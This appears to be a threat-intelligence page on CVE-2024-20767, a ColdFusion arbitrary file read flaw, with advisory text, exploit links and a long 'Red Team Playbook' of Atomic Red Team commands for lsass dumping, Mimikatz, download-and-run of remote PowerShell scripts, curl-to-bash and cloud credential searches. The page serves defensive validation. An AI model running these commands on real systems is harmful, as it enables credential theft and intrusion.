CVE-2024-20767
Overview
This vulnerability is an Improper Access Control flaw within Adobe ColdFusion's admin panel interface, specifically affecting the file handling mechanisms. The root cause is inadequate validation of file path parameters in certain API endpoints, allowing traversal beyond intended directories. The affected component is the ColdFusion server's administrative API, which fails to restrict access to sensitive filesystem locations.
Vulnerability Description
ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could result in arbitrary file system read. An attacker could leverage this vulnerability to access or modify restricted files. Exploitation of this issue does not require user interaction. Exploitation of this issue requires the admin panel be exposed to the internet.
Impact
An unauthenticated attacker with network access to the exposed ColdFusion admin panel can read and modify arbitrary files on the server filesystem. This enables disclosure of sensitive configuration or credential files and unauthorized alteration of server files, potentially leading to full system compromise. No user interaction is required, but the attack surface is limited to environments where the admin panel is publicly accessible, increasing risk of data breaches and operational disruption.
Solution
Adobe recommends applying the security updates detailed in their advisory APSB24-14, which addresses this improper access control issue in ColdFusion versions 2023.6 and 2021.12. Administrators should update affected ColdFusion installations to the fixed versions provided in the advisory. For detailed patching instructions and version-specific fixes, consult Adobe's official security bulletin at https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in specific versions of ColdFusion is characterized by improper access control, which allows unauthorized access to the file system. This flaw arises from insufficient validation of user permissions, enabling an attacker to read or modify files that should be restricted. The affected versions include ColdFusion 2023.6, 2021.12, and earlier iterations, which are widely used in web applications. The lack of adequate access controls means that sensitive files, potentially containing configuration settings, user data, or application logic, can be exposed to malicious actors. This vulnerability is particularly concerning as it does not necessitate any user interaction, simplifying the attack process for cyber adversaries.
Exploitation of this vulnerability can occur through various attack vectors, primarily when the administrative panel of ColdFusion is exposed to the internet. An attacker could leverage automated tools to scan for vulnerable instances and, upon discovering an accessible admin panel, execute crafted requests to gain unauthorized access to the file system. This could lead to the extraction of sensitive information, such as database credentials or proprietary code, which could be used for further attacks or sold on the dark web. Additionally, the ability to modify files could facilitate the insertion of malicious code, potentially leading to a full compromise of the web application and the underlying server.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on ColdFusion for their web applications. The potential for data breaches poses a serious business risk, including financial losses, reputational damage, and legal ramifications due to non-compliance with data protection regulations. Organizations may face costly remediation efforts, including incident response, forensic investigations, and public relations campaigns to restore trust. Furthermore, the exposure of sensitive data can lead to identity theft or fraud, impacting customers and stakeholders alike. The severity of this vulnerability, reflected in its CVSS score of 7.4, underscores the urgent need for organizations to address it promptly.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments, including vulnerability scanning and penetration testing, can help identify exposed administrative interfaces and other weaknesses in the system. Additionally, organizations should enforce strict access controls, ensuring that only authorized personnel can access sensitive areas of the application. Network segmentation and the use of firewalls can further protect the administrative panel from unauthorized access. Applying security patches and updates released by the vendor is crucial in closing the gap that allows exploitation of this vulnerability. Moreover, implementing logging and monitoring solutions can help detect suspicious activities, enabling organizations to respond swiftly to potential breaches.
In conclusion, the improper access control vulnerability in ColdFusion represents a critical security risk that can have far-reaching consequences for affected organizations. By understanding the technical details, potential attack vectors, and real-world impacts, organizations can better prepare themselves to defend against such threats. Proactive detection and mitigation strategies are essential in safeguarding sensitive information and maintaining the integrity of web applications built on this platform. As cyber threats continue to evolve, organizations must remain vigilant and prioritize security to protect their assets and reputation.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-20767, coinciding with the recent addition of this vulnerability to the KEV catalog. Our telemetry indicates that adversaries are increasingly leveraging publicly available proof-of-concept exploits, which have proliferated across multiple platforms, lowering the barrier for exploitation. This surge in activity underscores a shift from theoretical risk to active exploitation in the wild, particularly against ColdFusion admin panels exposed to the internet. While ransomware involvement remains unconfirmed, the heightened exploitation trend elevates the urgency for defenders to reassess exposure and monitoring strategies. Consequently, the threat level associated with CVE-2024-20767 has intensified from a potential vulnerability to an actively exploited risk, warranting increased vigilance in detection and response efforts.
Update 2 — June 07, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-20767, with telemetry indicating a doubling in detection frequency over recent monitoring periods. This increase coincides with a slight upward adjustment in the Exploit Prediction Scoring System (EPSS), reflecting growing confidence in active exploitation likelihood. Concurrently, multiple new proof-of-concept exploits have emerged publicly, enhancing adversaries’ capability to leverage this improper access control vulnerability against exposed Adobe ColdFusion admin panels. While ransomware involvement remains unconfirmed, the expanding exploit toolkit and rising detection trends signal a transition from theoretical risk to more widespread active targeting. For defenders, this evolution underscores the critical need to prioritize visibility and control over externally accessible ColdFusion management interfaces. The threat level associated with CVE-2024-20767 has consequently intensified, warranting elevated vigilance and proactive threat monitoring to detect and respond to exploitation attempts promptly.
Update 3 — June 19, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-20767, reflected by a significant uptick in detection activity across our sensors. Concurrently, the Exploit Prediction Scoring System (EPSS) score for this vulnerability has risen further, indicating an increasing likelihood of exploitation in the wild. This surge coincides with the emergence of multiple new proof-of-concept exploits publicly available on code-sharing platforms, which lowers the barrier for threat actors to weaponize this vulnerability. Although ransomware involvement remains unconfirmed, the expanding exploit toolkit and heightened exploitation signals suggest a growing operational interest that could facilitate more frequent and sophisticated attacks. For defenders, this evolution elevates the urgency to monitor exposure of Adobe ColdFusion admin panels, as the risk of arbitrary file system access is becoming more imminent. Overall, the threat level associated with CVE-2024-20767 has intensified from high to a critical posture, warranting increased vigilance and prioritization within threat detection and response frameworks.
Affected Products (20)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Adobe | Coldfusion | 2021 |
cpe:2.3:a:adobe:coldfusion:2021:-:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2021 |
cpe:2.3:a:adobe:coldfusion:2021:update1:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2021 |
cpe:2.3:a:adobe:coldfusion:2021:update10:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2021 |
cpe:2.3:a:adobe:coldfusion:2021:update11:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2021 |
cpe:2.3:a:adobe:coldfusion:2021:update12:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2021 |
cpe:2.3:a:adobe:coldfusion:2021:update2:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2021 |
cpe:2.3:a:adobe:coldfusion:2021:update3:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2021 |
cpe:2.3:a:adobe:coldfusion:2021:update4:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2021 |
cpe:2.3:a:adobe:coldfusion:2021:update5:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2021 |
cpe:2.3:a:adobe:coldfusion:2021:update6:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2021 |
cpe:2.3:a:adobe:coldfusion:2021:update7:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2021 |
cpe:2.3:a:adobe:coldfusion:2021:update8:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2021 |
cpe:2.3:a:adobe:coldfusion:2021:update9:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2023 |
cpe:2.3:a:adobe:coldfusion:2023:-:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2023 |
cpe:2.3:a:adobe:coldfusion:2023:update1:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2023 |
cpe:2.3:a:adobe:coldfusion:2023:update2:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2023 |
cpe:2.3:a:adobe:coldfusion:2023:update3:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2023 |
cpe:2.3:a:adobe:coldfusion:2023:update4:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2023 |
cpe:2.3:a:adobe:coldfusion:2023:update5:*:*:*:*:*:*
|
|
|
Adobe | Coldfusion | 2023 |
cpe:2.3:a:adobe:coldfusion:2023:update6:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
CVE-2024-20767 - Adobe Coldfusion Arbitrary File Read
auxiliary/gather/coldfusion_pms_servlet_file_read
|
ma4ter, yoryio, Christiaan Beek +1 | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Adobe ColdFusion 2023.6 - Remote File Read | İbrahimsql | webapps | multiple | - | View |
GitHub PoCs (6)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
yoryio/CVE-2024-20767
Exploit for CVE-2024-20767 - Adobe ColdFusion
|
yoryio | 34 | 9 | 2024-03-26 | View |
|
Chocapikk/CVE-2024-20767
Exploit Toolkit for Adobe ColdFusion CVE-2024-20767 Vulnerability
|
Chocapikk | 10 | 2 | 2024-03-26 | View |
|
m-cetin/CVE-2024-20767
Proof of Concept for CVE-2024-20767. Arbitrary file read from Adobe ColdFusion
|
m-cetin | 1 | 1 | 2024-03-26 | View |
|
Praison001/CVE-2024-20767-Adobe-ColdFusion
Exploit for CVE-2024-20767 affecting Adobe ColdFusion
|
Praison001 | 1 | 0 | 2024-04-01 | View |
|
PoC
|
- | 0 | 0 | - | View |
|
alm6no5/CVE-2024-20767
|
alm6no5 | 0 | 0 | 2025-07-19 | View |
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-20767 |
| helpx.adobe.com |
GitHub CVE
vendor-advisory
|
https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html |
| cisa.gov |
NVD API
Third Party Advisory
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-20767 |